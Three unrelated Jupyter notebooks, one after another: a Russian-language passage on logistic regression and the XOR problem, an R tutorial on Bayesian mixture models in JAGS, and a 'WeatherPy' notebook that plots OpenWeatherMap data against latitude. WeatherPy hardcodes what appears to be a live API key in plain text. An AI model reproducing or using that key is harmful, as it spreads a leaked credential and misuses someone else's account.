{'logisticregression__C': np.logspace(-5, 0, 6)} grid_logit = GridSearchCV(text_pipe_logit, param_grid_logit, cv=3, n_jobs=-1) grid_logit.fit(text_train, y_train) ``` **Лучшее значение C и соответствующее качество на кросс-валидации:** ``` grid_logit.best_params_, grid_logit.best_score_ plot_grid_scores(grid_logit, 'logisticregression__C') ``` На валидационной выборке: ``` grid_logit.score(text_test, y_test) ``` **Теперь то же самое, но со случайным лесом. Видим, что с логистической регрессией мы достигаем большей доли правильных ответов меньшими усилиями** ``` from sklearn.ensemble import RandomForestClassifier forest = RandomForestClassifier(n_estimators=200, n_jobs=-1, random_state=17) %%time forest.fit(X_train, y_train) round(forest.score(X_test, y_test), 3) ``` ### XOR-проблема Теперь рассмотрим пример, где линейные модели справляются хуже. Линейные методы классификации строят все же очень простую разделяющую поверхность – гиперплоскость. Самый известный игрушечный пример, в котором классы нельзя без ошибок поделить гиперплоскостью (то есть прямой, если это 2D), получил имя "the XOR problem". XOR – это "исключающее ИЛИ", булева функция со следующей таблицей истинности: <img src='../../img/XOR_table.gif'> XOR дал имя простой задаче бинарной классификации, в которой классы представлены вытянутыми по диагоналям и пересекающимися облаками точек. ``` # порождаем данные rng = np.random.RandomState(0) X = rng.randn(200, 2) y = np.logical_xor(X[:, 0] > 0, X[:, 1] > 0) plt.scatter(X[:, 0], X[:, 1], s=30, c=y, cmap=plt.cm.Paired); ``` Очевидно, нельзя провести прямую так, чтобы без ошибок отделить один класс от другого. Поэтому логистическая регрессия плохо справляется с такой задачей. ``` def plot_boundary(clf, X, y, plot_title): xx, yy = np.meshgrid(np.linspace(-3, 3, 50), np.linspace(-3, 3, 50)) clf.fit(X, y) # plot the decision function for each datapoint on the grid Z = clf.predict_proba(np.vstack((xx.ravel(), yy.ravel())).T)[:, 1] Z = Z.reshape(xx.shape) image = plt.imshow(Z, interpolation='nearest', extent=(xx.min(), xx.max(), yy.min(), yy.max()), aspect='auto', origin='lower', cmap=plt.cm.PuOr_r) contours = plt.contour(xx, yy, Z, levels=[0], linewidths=2, linetypes='--') plt.scatter(X[:, 0], X[:, 1], s=30, c=y, cmap=plt.cm.Paired) plt.xticks(()) plt.yticks(()) plt.xlabel(r'$x_1$') plt.ylabel(r'$x_2$') plt.axis([-3, 3, -3, 3]) plt.colorbar(image) plt.title(plot_title, fontsize=12); plot_boundary(LogisticRegression(), X, y, "Logistic Regression, XOR problem") ``` А вот если на вход подать полиномиальные признаки, в данном случае до 2 степени, то проблема решается. ``` from sklearn.preprocessing import PolynomialFeatures from sklearn.pipeline import Pipeline logit_pipe = Pipeline([('poly', PolynomialFeatures(degree=2)), ('logit', LogisticRegression())]) plot_boundary(logit_pipe, X, y, "Logistic Regression + quadratic features. XOR problem") ``` Здесь логистическая регрессия все равно строила гиперплоскость, но в 6-мерном пространстве признаков $1, x_1, x_2, x_1^2, x_1x_2$ и $x_2^2$. В проекции на исходное пространство признаков $x_1, x_2$ граница получилась нелинейной. На практике полиномиальные признаки действительно помогают, но строить их явно – вычислительно неэффективно. Гораздо быстрее работает SVM с ядровым трюком. При таком подходе в пространстве высокой размерности считается только расстояние между объектами (задаваемое функцией-ядром), а явно плодить комбинаторно большое число признаков не приходится. Про это подробно можно почитать в курсе Евгения Соколова – [тут](https://github.com/esokolov/ml-course-msu/blob/master/ML16/lecture-notes/Sem10_linear.pdf) (математика уже серьезная).
github_jupyter
Histograms of data often reveal that they do not follow any standard probability distribution. Sometimes we have explanatory variables (or covariates) to account for the different values, and normally distributed errors are adequate, as in normal regression. However, if we only have the data values themselves and no covariates, we might have to fit a non-standard distribution to the data. One way to do this is by mixing standard distributions. Mixture distributions are just a weighted combination of probability distribtuions. For example, we could take an exponential distribution with mean 1 and normal distribution with mean 3 and variance 1 (although typically the two mixture components would have the same support; here the exponential component has to be non-negative and the normal component can be positive or negative). Suppose we give them weights: 0.4 for the exponential distribution and 0.6 for the normal distribution. We could write the PDF for this distribution as <br> $$p(y) = 0.4 . exp(-y) . I_{(y>=0)} + 0.6 . \frac{1}{\sqrt{2\pi}} exp(-\frac{1}{2}(y-3)^{2})$$ The PDF of this mixture distribution would look like this: ``` options(repr.plot.width = 6, repr.plot.height=5) curve( 0.4*dexp(x, 1.0) + 0.6*dnorm(x, 3.0, 1.0), from=-2.0, to=7.0, ylab="density", xlab="y", main="40/60 mixture of exponential and normal distributions", lwd=2) ``` We could think of these two distributions as governing two distinct populations, one following the exponential distribution and the other following the normal distribution. Let’s draw the weighted PDFs for each population. ``` curve( 0.4*dexp(x, 1.0) + 0.6*dnorm(x, 3.0, 1.0), from=-2.0, to=7.0, ylab="density", xlab="y", main="40/60 mixture of exponential and normal distributions", lwd=2) curve( 0.4*dexp(x, 1.0), from=-2.0, to=7.0, col="red", lty=2, add=TRUE) curve( 0.6*dnorm(x, 3.0, 1.0), from=-2.0, to=7.0, col="blue", lty=2, add=TRUE) ``` The general form for a discrete mixture of distributions is as follows: $$p(y) = \sum_{j=1}^{J}w_{j}.f_{j}(y)$$ where the $\omega$’s are positive weights that add up to 1 (they are probabilities) and each of the J $f_{j}(y)$ functions is a PDF for some distribution. In the example above, the weights were 0.4 and 0.6, $f_{1}$ was an exponential PDF and $f_{2}$ was a normal PDF. One way to simulate from a mixture distribution is with a hierarchical model. We first simulate an indicator for which “population” the next observation will come from using the weights $\omega$. Let’s call this $z_{i}$. In the example above, $z_{i}$ would take the value 1 (indicating the exponential distribution) with probability 0.4 and 2 (indicating the normal distribution) with probability 0.6. Next, simulate the observation yi from the distribution corresponding to $z_{i}$. ``` set.seed(117) n = 1000 z = numeric(n) y = numeric(n) for(i in 1:n) { # returns a 1 with probability 0.4, or a 2 with probability 0.6 z[i] = sample.int(2, 1, prob = c(0.4, 0.6)) if(z[i] == 1) { y[i] = rexp(1, rate = 1.0) } else { y[i] = rnorm(1, mean = 3.0, sd = 1.0) } } hist(y, breaks = 40) ``` # Bayesian Inference for mixture models When we fit a mixture model to data, we usually only have the y values and do not know which “population” they belong to. Because the z variables are unobserved, they are called latent variables. We can treat them as parameters in a hierarchical model and perform Bayesian inference for them. The hierarchial model might look like this: $$ y_{i} \, | \, z_{i},\theta \, = \, f_{z_{i}}(y \, | \, \theta \,) \,\, i = 1,...,n $$<br> $$Pr(z_{i} | j,w) = w_{j}, j = 1,...,J$$<br> $$ w ~ p(w)$$<br> $$ \theta ~ p(\theta)$$ where we might use a Dirichlet prior (see the review of distributions in the supplementary material) for the weight vector ω and conjugate priors for the population-specific parameters in θ. With this model, we could obtain posterior distributions for z (population membership of the observations), ω (population weights), and θ (population-specific parameters in fj). Next, we will look at how to fit a mixture of two normal distributions in JAGS. ``` dat = read.csv("mixture.csv", header = FALSE) y = dat$V1 (n = length(y)) hist(y, breaks = 40) plot(density(y)) ``` It appears that we have two populations, but we do not know which population each observation belongs to. We can learn this, along with the mixture weights and population-specific parameters with a Bayesian hierarchical model. We will use a mixture of two normal distributions with variance 1 and different (and unknown) means. ``` library("rjags") library("coda") mod_string = " model { for(i in 1:length(y)){ y[i] ~ dnorm(mu[z[i]], prec) z[i] ~ dcat(omega) } mu[1] ~ dnorm(-1.0, 1.0/1e2) mu[2] ~ dnorm(1.0, 1.0/1e2) T(mu[1],) # ensures mu[1] < mu[2] prec ~ dgamma(1.0/2.0, 1.0*1.0/2.0) sig = sqrt(1.0/prec) omega ~ ddirich(c(1.0, 1.0)) } " set.seed(11) data_jags = list(y=y) params = c("mu", "sig", "omega", "z[1]", "z[31]", "z[49]", "z[6]") # Select some z's to monitor mod = jags.model(textConnection(mod_string), data=data_jags, n.chains=3) update(mod, 1e3) mod_sim = coda.samples(model=mod, variable.names=params, n.iter=5e4) mod_csim = as.mcmc(do.call(rbind, mod_sim)) ## convergence diagnostics options(repr.plot.height=8, repr.plot.width=8) plot(mod_sim, ask=TRUE) autocorr.diag(mod_sim) effectiveSize(mod_sim) ``` # Result ``` summary(mod_sim) par(mfrow=c(3,2)) densplot(mod_csim[,c("mu[1]", "mu[2]", "omega[1]", "omega[2]", "sig")]) ## for the z's options(repr.plot.height = 5, repr.ploy.width=8) par(mfrow=c(2,2)) densplot(mod_csim[,c("z[1]", "z[31]", "z[49]", "z[6]")]) table(mod_csim[,"z[1]"]) / nrow(mod_csim) table(mod_csim[,"z[31]"]) / nrow(mod_csim) table(mod_csim[,"z[49]"]) / nrow(mod_csim) table(mod_csim[,"z[6]"]) / nrow(mod_csim) y[c(1, 31, 49, 6)] ``` If we look back to the y values associated with these z variables we monitored, we see that y1 is clearly in Population 1’s territory, y31 is ambiguous, y49 is ambiguous but is closer to Population 2’s territory, and y6 is clearly in Population 2’s territory. The posterior distributions for the z variables closely reflect our assessment. ``` # Ignore this part. ``` # Poisson Example ``` dat = read.csv("callers.csv") head(dat) mod_str = " model { # Likelihood for (i in 1:length(calls)) { calls[i] ~ dpois( days_active[i] * lam[i] ) log(lam[i]) = b[1] + b[2]*age[i] + b[3]*isgroup2[i] } # Priors for(j in 1:3){ b[j] ~ dnorm(0, 1/1e4) } } " mod = jags.model(textConnection(mod_str), data = as.list(dat), n.chains = 3) update(mod, 5e3) params = c("b") mod_sim = coda.samples(mod, variable.names = params, n.iter = 1e4) mod_csim = as.mcmc(do.call(rbind, mod_sim)) colMeans(mod_csim) # Calculate the probability that a person of age 29 who is in group2, calls atleast 3 times a day. lamb = exp(mod_csim[,1] + mod_csim[,2]*29 + mod_csim[,3]*1) * 30 sum(rpois(30000, lamb) >= 3.0)/30000 ```
github_jupyter
# WeatherPy ---- ### Analysis * As expected, the weather becomes significantly warmer as one approaches the equator (0 Deg. Latitude). More interestingly, however, is the fact that the southern hemisphere tends to be warmer this time of year than the northern hemisphere. This may be due to the tilt of the earth. * There is no strong relationship between latitude and cloudiness, however, it is interesting to see that a strong band of cities sits at 0, 80, and 100% cloudiness. * There is no strong relationship between latitude and wind speed, however in northern hemispheres there is a flurry of cities with over 20 mph of wind. ``` # Dependencies and Setup import matplotlib.pyplot as plt import pandas as pd import numpy as np import seaborn as sns import requests import time import urllib # Incorporated citipy to determine city based on latitude and longitude from citipy import citipy # Output File (CSV) output_data_file = "output_data/cities.csv" # Range of latitudes and longitudes lat_range = (-90, 90) lng_range = (-180, 180) ``` ## Generate Cities List ``` # List for holding lat_lngs and cities lat_lngs = [] cities = [] # Create a set of random lat and lng combinations lats = np.random.uniform(low=-90.000, high=90.000, size=1500) lngs = np.random.uniform(low=-180.000, high=180.000, size=1500) lat_lngs = zip(lats, lngs) # Identify nearest city for each lat, lng combination for lat_lng in lat_lngs: city = citipy.nearest_city(lat_lng[0], lat_lng[1]).city_name # If the city is unique, then add it to a our cities list if city not in cities: cities.append(city) # Print the city count to confirm sufficient count len(cities) ``` ## Perform API Calls ``` # OpenWeatherMap API Key api_key = "924783bda048569443e49dd6a03e5591" # Starting URL for Weather Map API Call url = "http://api.openweathermap.org/data/2.5/weather?units=Imperial&APPID=" + api_key # List of city data city_data = [] # Print to logger print("Beginning Data Retrieval ") print("-----------------------------") # Create counters record_count = 1 set_count = 1 # Loop through all the cities in our list for i, city in enumerate(cities): # Group cities in sets of 50 for logging purposes if (i % 50 == 0 and i >= 50): set_count += 1 record_count = 0 # Create endpoint URL with each city city_url = url + "&q=" + urllib.request.pathname2url(city) # Log the url, record, and set numbers print("Processing Record %s of Set %s | %s" % (record_count, set_count, city)) print(city_url) # Add 1 to the record count record_count += 1 # Run an API request for each of the cities try: # Parse the JSON and retrieve data city_weather = requests.get(city_url).json() # Parse out the max temp, humidity, and cloudiness city_lat = city_weather["coord"]["lat"] city_lng = city_weather["coord"]["lon"] city_max_temp = city_weather["main"]["temp_max"] city_humidity = city_weather["main"]["humidity"] city_clouds = city_weather["clouds"]["all"] city_wind = city_weather["wind"]["speed"] city_country = city_weather["sys"]["country"] city_date = city_weather["dt"] # Append the City information into city_data list city_data.append({"City": city, "Lat": city_lat, "Lng": city_lng, "Max Temp": city_max_temp, "Humidity": city_humidity, "Cloudiness": city_clouds, "Wind Speed": city_wind, "Country": city_country, "Date": city_date}) # If an error is experienced, skip the city except: print("City not found. Skipping...") pass # Indicate that Data Loading is complete print("-----------------------------") print("Data Retrieval Complete ") print("-----------------------------") # Convert array of JSONs into Pandas DataFrame city_data_pd = pd.DataFrame(city_data) # Extract relevant fields from the data frame lats = city_data_pd["Lat"] max_temps = city_data_pd["Max Temp"] humidity = city_data_pd["Humidity"] cloudiness = city_data_pd["Cloudiness"] wind_speed = city_data_pd["Wind Speed"] # Export the City_Data into a csv city_data_pd.to_csv(output_data_file, index_label="City_ID") # Show Record Count city_data_pd.count() # Display the City Data Frame city_data_pd.head() ``` ## Latitude vs Temperature Plot ``` # Build scatter plot for latitude vs temperature plt.scatter(lats, max_temps, edgecolor="black", linewidths=1, marker="o", alpha=0.8, label="Cities") # Incorporate the other graph properties plt.title("City Latitude vs. Max Temperature (%s)" % time.strftime("%x")) plt.ylabel("Max Temperature (F)") plt.xlabel("Latitude") plt.grid(True) # Save the figure plt.savefig("output_data/Fig1.png") # Show plot plt.show() ``` ## Latitude vs. Humidity Plot ``` # Build the scatter plots for each city types plt.scatter(lats, humidity, edgecolor="black", linewidths=1, marker="o", alpha=0.8, label="Cities") # Incorporate the other graph properties plt.title("City Latitude vs. Humidity (%s)" % time.strftime("%x")) plt.ylabel("Humidity (%)") plt.xlabel("Latitude") plt.grid(True) # Save the figure plt.savefig("output_data/Fig2.png") # Show plot plt.show() ``` ## Latitude vs. Cloudiness Plot ``` # Build the scatter plots for each city types plt.scatter(lats, cloudiness, edgecolor="black", linewidths=1, marker="o", alpha=0.8, label="Cities") # Incorporate the other graph properties plt.title("City Latitude vs. Cloudiness (%s)" % time.strftime("%x")) plt.ylabel("Cloudiness (%)") plt.xlabel("Latitude") plt.grid(True) # Save the figure plt.savefig("output_data/Fig3.png") # Show plot plt.show() ``` ## Latitude vs. Wind Speed Plot ``` # Build the scatter plots for each city types plt.scatter(lats, wind_speed, edgecolor="black", linewidths=1, marker="o", alpha=0.8, label="Cities") # Incorporate the other graph properties plt.title("City Latitude vs. Wind Speed (%s)" % time.strftime("%x")) plt.ylabel("Wind Speed (mph)") plt.xlabel("Latitude") plt.grid(True) # Save the figure plt.savefig("output_data/Fig4.png") # Show plot plt.show() ```
github_jupyter